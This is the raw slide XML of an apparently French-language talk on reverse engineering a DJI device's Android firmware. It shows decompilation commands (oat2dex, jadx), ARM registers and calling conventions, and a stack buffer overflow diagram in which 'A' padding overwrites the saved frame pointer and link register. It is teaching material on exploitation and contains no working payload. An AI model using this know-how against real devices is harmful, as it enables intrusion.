                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-system/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/arm/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>boot.oat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="3000" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>$ oat2dex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>SystemUpgrade.odex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odex</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="3000" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>jadx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>deobf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> SystemUpgrade-classes1.dex –d source  </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="3000" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRP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789040"/>
            <a:ext cx="11172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Reverse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0" y="1764051"/>
            <a:ext cx="5468669" cy="1886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32" y="2348880"/>
            <a:ext cx="5296649" cy="662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86" y="3778552"/>
            <a:ext cx="10976923" cy="5145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0304" y="4421380"/>
            <a:ext cx="11209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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>mnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>dji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> -R '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>android.dji.server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>Fichier binaire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>DJIService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>/arm/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>DJIService.odex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> correspondant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>Fichier binaire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>SystemSetup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>/arm/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>SystemSetup.odex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> correspondant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>Fichier binaire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>SystemUpgrade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>/arm/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>SystemUpgrade.odex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> correspondant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Fichier binaire bin/assistant correspondant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>Fichier binaire lib/libusbdec.so correspondant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>Fichier binaire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>priv-app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t>/Settings/arm/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>Settings.odex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> correspondant</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6540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Reverse (2)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61573" r="27835"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="191344" y="2348880"/>
            <a:ext cx="6835329" cy="21939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472433"/>
            <a:ext cx="2455832" cy="626237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7026673" y="3140968"/>
            <a:ext cx="1229567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In-Memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Layout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> of a Program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94" y="1844824"/>
            <a:ext cx="5046811" cy="4794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7688" y="66219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https://gabrieletolomei.wordpress.com/miscellanea/operating-systems/in-memory-layout/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15525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ARM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828800"/>
            <a:ext cx="6156176" cy="4768552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latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Registers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>R0 – R10: General </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>purpose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R11 (FP) : Frame Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>R13 (SP) : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>R14 (LR) : Link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Register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R15 (PC) : Program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Counter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Instructions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>MOV : Move data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>STR : Store</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>LDR : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Load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BL : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Branch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with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>PUSH/POP : Push on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/ Pop on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>stack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…</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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24192" y="182320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2 Instruction sets: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ARM (32 bits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>wide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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j-lt"/>
              </a:rPr>
              <a:t>Thumb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> (16 bits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>wide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr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6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w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>hoami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911424" y="1484784"/>
            <a:ext cx="9756576" cy="3602021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fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Tomtombinary</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId3" tooltip="http://www.tomtombinary.xyz"/>
              </a:rPr>
              <a:t>http://www.tomtombinary.xyz</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.root-me.org/Tomtombinary</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>github.com/Tomtombinary</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>twitter.com/tomtombinary</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Aperi’Kube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0"/>
              <a:t> team,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0"/>
              <a:t> / Reverse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/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4" y="5086805"/>
            <a:ext cx="1728192" cy="1728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558413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Leaf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> and non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>leaf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err="1"/>
              <a:t>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1938536"/>
            <a:ext cx="648072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F1</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Connecteur droit avec flèche 5"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="2"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1307468" y="2442592"/>
            <a:ext cx="864096" cy="842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83432" y="3284984"/>
            <a:ext cx="6480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F2</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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1624" y="3284984"/>
            <a:ext cx="648072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F3</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Connecteur droit avec flèche 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="2"/>
            <a:endCxn id="10" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2171564" y="2442592"/>
            <a:ext cx="864096" cy="842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91744" y="1938536"/>
            <a:ext cx="157454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leaf</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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1743" y="2643594"/>
            <a:ext cx="1574549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n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>on-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>leaf</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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1624" y="4602088"/>
            <a:ext cx="6480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F4</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Connecteur droit avec flèche 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="2"/>
            <a:endCxn id="22" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3035660" y="3789040"/>
            <a:ext cx="0" cy="813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104112" y="1938536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F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ush {r11,lr}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r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>bl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> f2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> r5,r0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r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>pop {r11,pc}</a:t>
            </a:r>
          </a:p>
          <a:p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F2:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>push {r11}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r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>pop {r11}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>bx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lr</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR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79376" y="5616466"/>
            <a:ext cx="5976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BL and BLX instructions copy the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address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the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next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instruction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into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(r14, the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link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register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Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>overflow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91944" y="2991891"/>
            <a:ext cx="20162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83832" y="2991890"/>
            <a:ext cx="10081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655840" y="6160243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176960" y="2807224"/>
            <a:ext cx="13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FP (R11)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04731" y="5975577"/>
            <a:ext cx="5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591944" y="2568226"/>
            <a:ext cx="2016224" cy="42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+mj-lt"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>aved</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> FP</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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91944" y="2144562"/>
            <a:ext cx="2016224" cy="42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+mj-lt"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>aved</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> LR</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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19936" y="6323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55940" y="16160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591944" y="4257742"/>
            <a:ext cx="2016224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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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655840" y="5481878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58350" y="5297212"/>
            <a:ext cx="180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b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>uffer [32];</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt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5504802" y="3959353"/>
            <a:ext cx="0" cy="1337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43952" y="2068560"/>
            <a:ext cx="25795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vuln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push {r11,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r11,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#0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latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> sp,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>,#xx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…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08117" y="1902432"/>
            <a:ext cx="2579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latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>b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lx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vuln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latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> r5,r0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8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Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>overflow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63952" y="3052194"/>
            <a:ext cx="20162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655840" y="3052193"/>
            <a:ext cx="10081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680176" y="305219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36555" y="2860049"/>
            <a:ext cx="121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FP (R11)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12224" y="2867527"/>
            <a:ext cx="5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63952" y="2628529"/>
            <a:ext cx="2016224" cy="42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s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>aved</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> FP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663952" y="2204865"/>
            <a:ext cx="2016224" cy="42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s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>aved</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> LR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91944" y="638360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27948" y="16763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663952" y="2204864"/>
            <a:ext cx="2016224" cy="33373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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="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727848" y="5542181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99656" y="5357515"/>
            <a:ext cx="172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b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>uffer [32];</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt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5576810" y="4019656"/>
            <a:ext cx="0" cy="1337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040216" y="342900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j-lt"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>uln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>: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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>dd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> sp,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>,#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>xx</a:t>
            </a:r>
